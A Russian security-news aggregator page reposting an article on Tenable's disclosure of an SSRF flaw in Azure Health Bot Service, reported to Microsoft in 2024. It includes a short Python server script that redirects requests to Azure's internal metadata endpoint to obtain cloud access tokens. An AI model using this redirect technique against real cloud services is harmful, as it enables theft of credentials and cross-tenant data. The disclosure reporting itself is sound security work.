Новости компьютерной безопасности:

  Latest News

Critical SSRF Vulnerability in Microsoft Azure Let Hackers Compromise Health Bot Services

С сайта: Vulnerability(cybersecuritynews.com)

Critical SSRF Vulnerability in Microsoft Azure Let Hackers Compromise Health Bot Services

Author: Balaji N

Tenable Research has uncovered significant security vulnerabilities in Microsoft’s Azure Health Bot Service, a cloud platform designed to enable healthcare professionals to deploy AI-powered virtual health assistants.

The Azure AI Health Bot Service is a cloud-based platform designed for healthcare organizations. It enables developers to create and deploy AI-driven virtual health assistants, which help streamline processes and reduce costs while ensuring compliance with industry standards.

These vulnerabilities allowed unauthorized access to cross-tenant resources, raising concerns about potential lateral movement to other resources within the service.

Tenable’s investigation focused on a feature called “Data Connections,” which allows the Azure Health Bot Service to interact with external data sources. While testing these data connections, researchers discovered a server-side request forgery (SSRF) vulnerability.

This vulnerability enabled them to bypass existing security filters and access sensitive internal endpoints, such as Azure’s Internal Metadata Service (IMDS).

Technical Analysis
The SSRF vulnerability was exploited by configuring a data connection to redirect requests to an external host controlled by the Attackers.

The host was set up to respond with a 301 redirect to the IMDS endpoint, allowing the researchers to obtain a valid metadata response. Using this response, they acquired an access token for management.azure.com and subsequently listed subscriptions and resources belonging to other customers.

The Tannable researchers employed a Python script to set up the HTTP server that facilitated the SSRF attack:

#!/usr/bin/python3 from http.server import HTTPServer, BaseHTTPRequestHandler
def servePage(s, hverb): s.protocol_version = 'HTTP/1.1' s.server_version = 'Microsoft-IIS/8.5' s.sys_version = '' s.send_response(301) s.send_header('Location', 'http://169.254.169.254/metadata/instance?api-version=2021-12-13') s.end_headers() message = "" s.wfile.write(bytes(message, "utf8")) return
class StaticServer(BaseHTTPRequestHandler): def do_GET(self): servePage(self, "GET") return
def main(server_class=HTTPServer, handler_class=StaticServer, port=80): server_address = ('', port) httpd = server_class(server_address, handler_class) httpd.serve_forever()
main()
This host wasconfigured torespond to requests witha 301 redirect response destinedfor Azure’s IMDS. Using thistechnique, attackers could obtain avalid metadataresponse andsubsequently obtainan access token formanagement.azure.com.

Response and Mitigation
Upon discovering the vulnerabilities, Tenable immediately reported them to Microsoft’s Security Response Center (MSRC) on June 17, 2024. MSRC quickly acknowledged the report and began implementing fixes.

Tenable later identified another vulnerable endpoint for validating FHIR endpoints’ data connections. Although this endpoint was susceptible to a similar attack, it did not allow cross-tenant access. This second issue was reported on July 9, with fixes implemented by July 12.

These vulnerabilities underscore the importance of robust web applications and cloud security mechanisms, even in AI-powered services.

While no evidence suggests that malicious actors exploited these vulnerabilities, the incident highlights the need for continuous security auditing and proactive vulnerability management.



#Vulnerability #cyber_security #cyber_security_news #vulnerability

Оригинальная версия на сайте: Critical SSRF Vulnerability in Microsoft Azure Let Hackers Compromise Health Bot Services
Вернуться к списку новостей К свежим новостям Здесь был google AdSense.
Вместо рекламы товаров началась политическая агитация.
Отключено до получения извинений.

Вернуться к списку новостей Здесь был google AdSense.
Вместо рекламы товаров началась политическая агитация.
Отключено до получения извинений.


Новости проекта CSN:

✉ CSN.net4me.net

Обновление сайта csn.net4me.net

Обновление сайта csn.net4me.net 💻
cyber security news
  • Физически мы переехали на новый сервер. Благодарим наших подписчиков и постоянных читателей за терпение и понимание.
  • Сайт csn.net4me.net полностью адаптирован для работы по шифрованному SSL соединению.
  • Изменен механизм обработки и отображения опасных и критических уязвимостей.

Благодарим что вы с нами.


#CSN_обновление_сайта
https://csn.net4me.net/cyber_security_8301.html

Дополнительный материал

О проекте CSN

Проект CSN.net4me.net родился 16 Марта 2018 года.
Проект находится в самом начале своего развития. Конечно оформление, наполнение будет меняться. Одно останется неизменным - самые свежие новости компьютерной и сетевой безопасности.

О проекте net4me

Проект net4me.net развивался как сборник готовых решений и документации по темам компьютерной безопасности, сетевых решений и СПО (в часности linux). Темпы развития IT отрасли оказались столь быстрыми, что некоторые знания, технологии и информация о них устаревали мгновенно. Тем не менее, некоторый материал net4me.net до сих пор востребован.

Об источниках

Новости берутся CSN из открытых и доступных каждому источников. Авторы проекта стараются подбирать авторитетные и проверенные источники. Но, тем не менее, не несут ответственности за содержимое новостей. В каждой новости указывается источник этой новости, её автор и ссылка на оригинал новости.

Информация

Если вы желаете чтобы новости вашего ресурса были размещены на сайте CSN, то свяжитесь с авторами проекта csn@net4me.net и предложите ссылку на rss или xml ленту новостей вашего ресурса. Любая предложенная информация будет рассмотрена редакцией.